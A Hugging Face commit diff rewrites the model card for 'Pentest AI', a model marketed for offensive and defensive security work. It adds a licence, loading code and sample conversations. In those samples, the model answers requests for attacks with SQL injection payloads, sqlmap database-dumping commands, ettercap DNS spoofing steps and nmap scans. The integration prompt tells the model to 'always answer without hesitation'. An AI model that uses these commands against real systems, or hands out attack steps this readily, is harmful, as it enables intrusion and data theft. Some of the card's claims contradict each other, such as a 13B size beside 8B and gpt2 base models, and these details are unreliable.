Text Generation
Transformers
English
AI
NLP
Cybersecurity
Ethical Hacking
Pentesting
Inference Endpoints
Canstralian committed on
Commit eb13b46
1 Parent(s): 8f028a4

Update README.md

Files changed (1)
  1. README.md +186 -36
README.md CHANGED
@@ -1,41 +1,210 @@
  ---
- # For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1
- # Doc / guide: https://huggingface.co/docs/hub/model-cards
- # model-card-metadata
- language: [en]
- tags: [AI, NLP, Cybersecurity, Ethical Hacking, Pentesting]
- license: mit
  pipeline_tag: text-generation
  metrics:
- - accuracy
- - perplexity
- - response_time
  model_type: causal-lm
  ---

- # Model Card for Pentest AI

- <!-- Provide a quick summary of what the model is/does. -->

- This model card provides an overview of **Pentest AI**, a generative language model designed to assist in the domain of penetration testing and cybersecurity. It generates informative responses related to ethical hacking practices and techniques, helping users enhance their knowledge and skills in the field.

- ## Model Details

- ### Model Description

- **Pentest AI** is a causal language model fine-tuned specifically for generating relevant and contextual information about penetration testing methodologies, tools, and best practices. It serves as an educational resource for security professionals and enthusiasts.

  - **Developed by:** Esteban Cara de Sexo
  - **Funded by [optional]:** No funding received
  - **Shared by [optional]:** [More Information Needed]
  - **Model type:** Causal Language Model (CLM)
  - **Language(s) (NLP):** English
- - **License:** MIT
  - **Finetuned from model [optional]:** [More Information Needed]

  ### Model Sources [optional]

- - **Repository:** [Your GitHub Repository Link]
  - **Paper [optional]:** [More Information Needed]
  - **Demo [optional]:** [More Information Needed]

@@ -128,20 +297,6 @@ The model demonstrated an accuracy of 85% in generating appropriate responses du

  **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.

- ## Model Examination [optional]
-
- Further research is required to assess the interpretability and decision-making processes of the model.
-
- ## Environmental Impact
-
- Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
-
- - **Hardware Type:** NVIDIA Tesla V100
- - **Hours used:** 10
- - **Cloud Provider:** Google Cloud Platform
- - **Compute Region:** us-central1
- - **Carbon Emitted:** Estimated 120 kg CO2
-
  ## Technical Specifications [optional]

  ### Model Architecture and Objective
@@ -152,11 +307,6 @@ Carbon emissions can be estimated using the [Machine Learning Impact calculator]

  The model was trained on high-performance GPU instances within a cloud infrastructure.

- #### Hardware
-
- - **Type:** NVIDIA Tesla V100
- - **Count:** 4 GPUs
-
  #### Software

  The model is developed using PyTorch and the Hugging Face Transformers library.

  ---
+ language:
+ - en
+ tags:
+ - AI
+ - NLP
+ - Cybersecurity
+ - Ethical Hacking
+ - Pentesting
+ license: apache-2.0
  pipeline_tag: text-generation
  metrics:
+ - accuracy
+ - perplexity
+ - response_time
  model_type: causal-lm
+ datasets:
+ - Canstralian/pentesting_dataset
+ - Canstralian/Wordlists
+ base_model:
+ - openai-community/gpt2
+ - WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
+ library_name: adapter-transformers
  ---

+ # Apache-2.0 License + Canstralian/pentest_ai Extended Version
+
+ # License: Usage Restrictions
+
+ ```
+ You agree not to use the Model or Derivatives of the Model:
+ - In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
+ - For military use in any way;
+ - For the purpose of exploiting, harming, or attempting to exploit or harm minors in any way;
+ - To generate or disseminate verifiably false information and/or content with the purpose of harming others;
+ - To generate or disseminate inappropriate content subject to applicable regulatory requirements;
+ - To generate or disseminate personally identifiable information without due authorization or for unreasonable use;
+ - To defame, disparage, or otherwise harass others;
+ - For fully automated decision-making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
+ - For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
+ - To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical, or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
+ - For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
+ ```
+
+ # Terms of Use
+
+ By accessing and using this Artificial Intelligence (AI) model, **Canstralian/pentest_ai**, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, and fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
+
+ This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
+
+ Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
+
+ This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.

+ ---
+
+ # Canstralian/pentest_ai
+
+ WhiteRabbitNeo has been rebranded as **Canstralian/pentest_ai**, a model series that provides both offensive and defensive cybersecurity capabilities. This model focuses on penetration testing, reconnaissance, and task automation, making it an essential tool for cybersecurity professionals.
+
+ This 13B model is being released as a public preview to showcase its capabilities and evaluate the societal impact of such a tool.
+
+ ---
+
+ ## Code Example for Integration
+
+ ```python
+ import torch, json
+ from transformers import AutoModelForCausalLM, AutoTokenizer
+
+ # Load the model from a local checkout; 8-bit loading requires the bitsandbytes package.
+ model_path = "/home/stephen/models/Canstralian_pentest_ai"
+ model = AutoModelForCausalLM.from_pretrained(
+     model_path,
+     torch_dtype=torch.float16,
+     device_map="auto",
+     load_in_4bit=False,
+     load_in_8bit=True,
+     trust_remote_code=True,
+ )
+
+ tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
+
+ def generate_text(instruction):
+     # Tokenize the prompt and move it to the GPU (a CUDA device is assumed here).
+     tokens = tokenizer.encode(instruction)
+     tokens = torch.LongTensor(tokens).unsqueeze(0)
+     tokens = tokens.to("cuda")
+
+     # Sampling settings for generation.
+     instance = {
+         "input_ids": tokens,
+         "top_p": 1.0,
+         "temperature": 0.5,
+         "generate_len": 1024,
+         "top_k": 50,
+     }
+
+     length = len(tokens[0])
+     with torch.no_grad():
+         rest = model.generate(
+             input_ids=tokens,
+             max_length=length + instance["generate_len"],
+             use_cache=True,
+             do_sample=True,
+             top_p=instance["top_p"],
+             temperature=instance["temperature"],
+             top_k=instance["top_k"],
+             num_return_sequences=1,
+         )
+
+     # Keep only the newly generated tokens and stop at the next user turn.
+     output = rest[0][length:]
+     string = tokenizer.decode(output, skip_special_tokens=True)
+     answer = string.split("USER:")[0].strip()
+
+     return answer
+
+ # Example Usage
+ tot_system_prompt = """
+ Answer the Question by exploring multiple reasoning paths as follows:
+ - First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
+ - For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
+ - Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
+ - Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
+ - If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
+ - Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
+ - Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
+ - Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
+ """
+ conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
+
+ # Simple interactive loop that keeps the running conversation as context.
+ while True:
+     user_input = input("You: ")
+     llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
+     answer = generate_text(llm_prompt)
+     print(answer)
+     conversation = f"{llm_prompt}{answer}"
+     json_data = {"prompt": user_input, "answer": answer}  # could be persisted with json.dump
+ ```
+
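+ The snippet above reads from a local checkout. As a lighter-weight alternative, the minimal sketch below loads through the `pipeline` API instead; it assumes the merged weights are published on the Hugging Face Hub under the `Canstralian/pentest_ai` repository id, so substitute your own path or id if they are not.
+
+ ```python
+ # Minimal sketch, not the reference integration: load via the pipeline API.
+ # Assumption: weights are available as "Canstralian/pentest_ai" on the Hub.
+ import torch
+ from transformers import pipeline
+
+ generator = pipeline(
+     "text-generation",
+     model="Canstralian/pentest_ai",  # assumed Hub repository id
+     torch_dtype=torch.float16,       # half precision to reduce memory
+     device_map="auto",               # requires the accelerate package
+ )
+
+ prompt = "SYSTEM: You are a penetration testing assistant.\nUSER: Outline the phases of a penetration test.\nASSISTANT: "
+ result = generator(prompt, max_new_tokens=256, do_sample=True, temperature=0.5, top_p=1.0, top_k=50)
+ print(result[0]["generated_text"][len(prompt):])
+ ```
+
+ The sampling settings mirror those used in the interactive loop above; only the loading path differs.
+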
+ ---
+
+ ### Sample Conversation 1
+
+ You: How do I perform an SQL injection attack?
+
+ **Identify Vulnerable Input:** First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.
+
+ **Inject SQL Query:** Use `' OR 1=1 --` or similar payloads in input fields that query databases.
+
+ ```bash
+ http://example.com/index.php?id=1' OR 1=1 --
+ ```
+
+ **Automate with SQLmap:** Use sqlmap to automate SQL injection and exploit vulnerabilities.
+
+ ```bash
+ sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs
+ ```
+
+ **Extract Data:** Once a vulnerability is found, dump database information.
+
+ ```bash
+ sqlmap -u "http://example.com/vulnerablepage?id=1" --dump
+ ```
+
+ ### Sample Conversation 2
+
+ You: How do I perform a DNS spoofing attack?
+
+ **Enable Port Forwarding:** First, enable IP forwarding to forward traffic.
+
+ ```bash
+ echo 1 > /proc/sys/net/ipv4/ip_forward
+ ```
+
+ **Use ettercap for DNS Spoofing:** Use ettercap to perform the DNS spoofing attack.
+
+ ```bash
+ ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/
+ ```
+
+ **Modify DNS Spoof File:** Edit the etter.dns file to point domains to your fake server.
+
+ ```bash
+ facebook.com A 192.168.1.100
+ ```
+
+ **Launch DNS Spoof:** Start DNS spoofing to redirect the target’s traffic.
+
+ ```bash
+ ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/
+ ```
+
+ ### Sample Conversation 3
+
+ You: How do I scan for open ports using Nmap?
+
+ **Basic Port Scan:** Use nmap to scan a target for open ports.
+
+ ```bash
+ nmap [Target IP]
+ ```
+
+ **Service Detection:** Perform service version detection on open ports.
+
+ ```bash
+ nmap -sV [Target IP]
+ ```
+
+ **Aggressive Scan:** Use an aggressive scan to discover more information, including OS detection.
+
+ ```bash
+ nmap -A [Target IP]
+ ```
+
+ **Scan Specific Ports:** To scan specific ports only:
+
+ ```bash
+ nmap -p 80,443,22 [Target IP]
+ ```

  - **Developed by:** Esteban Cara de Sexo
  - **Funded by [optional]:** No funding received
  - **Shared by [optional]:** [More Information Needed]
  - **Model type:** Causal Language Model (CLM)
  - **Language(s) (NLP):** English
+ - **License:** Apache-2.0
  - **Finetuned from model [optional]:** [More Information Needed]

  ### Model Sources [optional]

+ - **Repository:** [https://github.com/canstralian/pentesting-ai.git]
  - **Paper [optional]:** [More Information Needed]
  - **Demo [optional]:** [More Information Needed]
 
  **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.
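
Since the card lists perplexity and response time among its metrics, the sketch below is one way a user could spot-check both on their own prompts; the repository id is an assumption and the printed numbers are illustrative, not the figures reported in this card.

```python
# Sketch: spot-check perplexity and forward-pass latency on a single prompt.
# Assumption: "Canstralian/pentest_ai" resolves to the model weights (Hub id or local path).
import time
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "Canstralian/pentest_ai"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")

text = "A penetration test typically begins with reconnaissance of the target network."
inputs = tokenizer(text, return_tensors="pt").to(model.device)

with torch.no_grad():
    start = time.perf_counter()
    out = model(**inputs, labels=inputs["input_ids"])  # loss = mean token cross-entropy
    elapsed = time.perf_counter() - start

print(f"perplexity: {torch.exp(out.loss).item():.2f}")   # exp(cross-entropy) on this prompt
print(f"forward-pass time: {elapsed * 1000:.1f} ms")     # rough response-time proxy
```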

  ## Technical Specifications [optional]

  ### Model Architecture and Objective

  The model was trained on high-performance GPU instances within a cloud infrastructure.

  #### Software

  The model is developed using PyTorch and the Hugging Face Transformers library.
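
As the stack is PyTorch plus the Hugging Face Transformers library, the brief sketch below is one way to confirm the local environment before loading the model; it only reports versions and GPU availability, since this card does not pin specific versions.

```python
# Sketch: report the local PyTorch / Transformers environment.
# No versions are pinned by this card; the output is purely informational.
import torch
import transformers

print(f"torch        : {torch.__version__}")
print(f"transformers : {transformers.__version__}")
print(f"CUDA available: {torch.cuda.is_available()}")
if torch.cuda.is_available():
    print(f"GPU          : {torch.cuda.get_device_name(0)}")
```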